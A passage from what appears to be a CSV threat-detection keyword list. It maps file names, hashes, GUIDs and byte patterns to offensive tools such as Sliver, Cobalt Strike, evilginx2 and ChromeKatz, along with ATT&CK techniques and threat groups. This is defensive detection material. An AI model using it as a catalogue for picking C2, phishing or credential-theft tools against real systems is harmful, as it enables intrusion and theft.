- TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*catspin_poc.mp4*",".{0,1000}catspin_poc\.mp4.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*catspin_poc_final.mp4*",".{0,1000}catspin_poc_final\.mp4.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*CB 4D 85 D2 74 10 41 8A 00 4D 03 C3 88 02 49 03 D3 4D 2B D3*",".{0,1000}CB\s4D\s85\sD2\s74\s10\s41\s8A\s00\s4D\s03\sC3\s88\s02\s49\s03\sD3\s4D\s2B\sD3.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","#yara rule","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cb0a620a960506193df32016f825248dec7fe504d8b857ee54a88ad1bdf8d9ce*",".{0,1000}cb0a620a960506193df32016f825248dec7fe504d8b857ee54a88ad1bdf8d9ce.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*cb0bdce759cc157371559d3a570630af5bc64c050a7cc79ef95062d3d0db987e*",".{0,1000}cb0bdce759cc157371559d3a570630af5bc64c050a7cc79ef95062d3d0db987e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*cb12cf3f7f44250c5a2142d506921aa3c2ae8a1c6ef2f3781b3bf2ae7eb6cad4*",".{0,1000}cb12cf3f7f44250c5a2142d506921aa3c2ae8a1c6ef2f3781b3bf2ae7eb6cad4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*cb21e55fb1b580820aaf8090eae7e49cd59360e91456ab85a74828107e1dedde*",".{0,1000}cb21e55fb1b580820aaf8090eae7e49cd59360e91456ab85a74828107e1dedde.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*cb291da763f1ac7b8221be536e9d110a4c937c749da51b15151975c1b84f8b6d*",".{0,1000}cb291da763f1ac7b8221be536e9d110a4c937c749da51b15151975c1b84f8b6d.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*cb3754f82aa212d4875c36e00ee5cdbb84f35250b08f019f8b30a2027e00a0bf*",".{0,1000}cb3754f82aa212d4875c36e00ee5cdbb84f35250b08f019f8b30a2027e00a0bf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*cb4272e5aeafc2ee72b02f1f80818ff10214156ed4b8a4ecf12730b13e9a6fd9*",".{0,1000}cb4272e5aeafc2ee72b02f1f80818ff10214156ed4b8a4ecf12730b13e9a6fd9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*cb4a4a24fdd61493e58d83befacd93981771c5e8e7ff206b1c6050134613ae4a*",".{0,1000}cb4a4a24fdd61493e58d83befacd93981771c5e8e7ff206b1c6050134613ae4a.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*CB561720-0175-49D9-A114-FE3489C53661*",".{0,1000}CB561720\-0175\-49D9\-A114\-FE3489C53661.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*CB790E12-603E-4C7C-9DC1-14A50819AF8C*",".{0,1000}CB790E12\-603E\-4C7C\-9DC1\-14A50819AF8C.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*cb93e410d0d8660c4aef3b7f98c08408d3ca972b898705d681d9a569b61c703b*",".{0,1000}cb93e410d0d8660c4aef3b7f98c08408d3ca972b898705d681d9a569b61c703b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*cbbadc6ef65c597a7cd81e6f98758815d35ac0530367d87341dd0618b5c7359b*",".{0,1000}cbbadc6ef65c597a7cd81e6f98758815d35ac0530367d87341dd0618b5c7359b.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*cbbb2f474f0ca015a37d57ec856950db3ce62942c8dd737003a9cc8f7cf63c07*",".{0,1000}cbbb2f474f0ca015a37d57ec856950db3ce62942c8dd737003a9cc8f7cf63c07.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*cbe60ddb0c22d6a5743901dd06d855958a68a90ab0820665acd1e7b53f0a9c71*",".{0,1000}cbe60ddb0c22d6a5743901dd06d855958a68a90ab0820665acd1e7b53f0a9c71.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","#hash","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "*cbf03e162816e6ba6863355f82b4e9e9853f529d11aa95141fc59781496f8e65*",".{0,1000}cbf03e162816e6ba6863355f82b4e9e9853f529d11aa95141fc59781496f8e65.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*CC127443-2519-4E04-8865-A6887658CDE5*",".{0,1000}CC127443\-2519\-4E04\-8865\-A6887658CDE5.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*cc2_keystrokes*",".{0,1000}cc2_keystrokes.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*cc2_keystrokes_*",".{0,1000}cc2_keystrokes_.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*cc2_mimipenguin.*",".{0,1000}cc2_mimipenguin\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*cc2_portscan*",".{0,1000}cc2_portscan.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*cc2_portscan_*",".{0,1000}cc2_portscan_.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*cc2_rebind_*_get_recv*",".{0,1000}cc2_rebind_.{0,1000}_get_recv.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*cc2_rebind_*_get_send*",".{0,1000}cc2_rebind_.{0,1000}_get_send.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*cc2_rebind_*_post_recv*",".{0,1000}cc2_rebind_.{0,1000}_post_recv.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*cc2_rebind_*_post_send*",".{0,1000}cc2_rebind_.{0,1000}_post_send.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*cc2_udp_server*",".{0,1000}cc2_udp_server.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*cc2FilesColor.*",".{0,1000}cc2FilesColor\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*cc2ProcessColor.*",".{0,1000}cc2ProcessColor\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*cc4e23ea2383b1649d22a6bd176f8b27505919a61d2e838ad337743c32702de7*",".{0,1000}cc4e23ea2383b1649d22a6bd176f8b27505919a61d2e838ad337743c32702de7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*cc5855ec2f5ac4e236e8e6cba698d4d307baa15a827c7719f4d6c8a58d28299b*",".{0,1000}cc5855ec2f5ac4e236e8e6cba698d4d307baa15a827c7719f4d6c8a58d28299b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*cc9f09bbdb9277265fd71b7575b1fdda3bc2f946*",".{0,1000}cc9f09bbdb9277265fd71b7575b1fdda3bc2f946.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*ccache2john.py*",".{0,1000}ccache2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ccache2john.py*",".{0,1000}ccache2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - 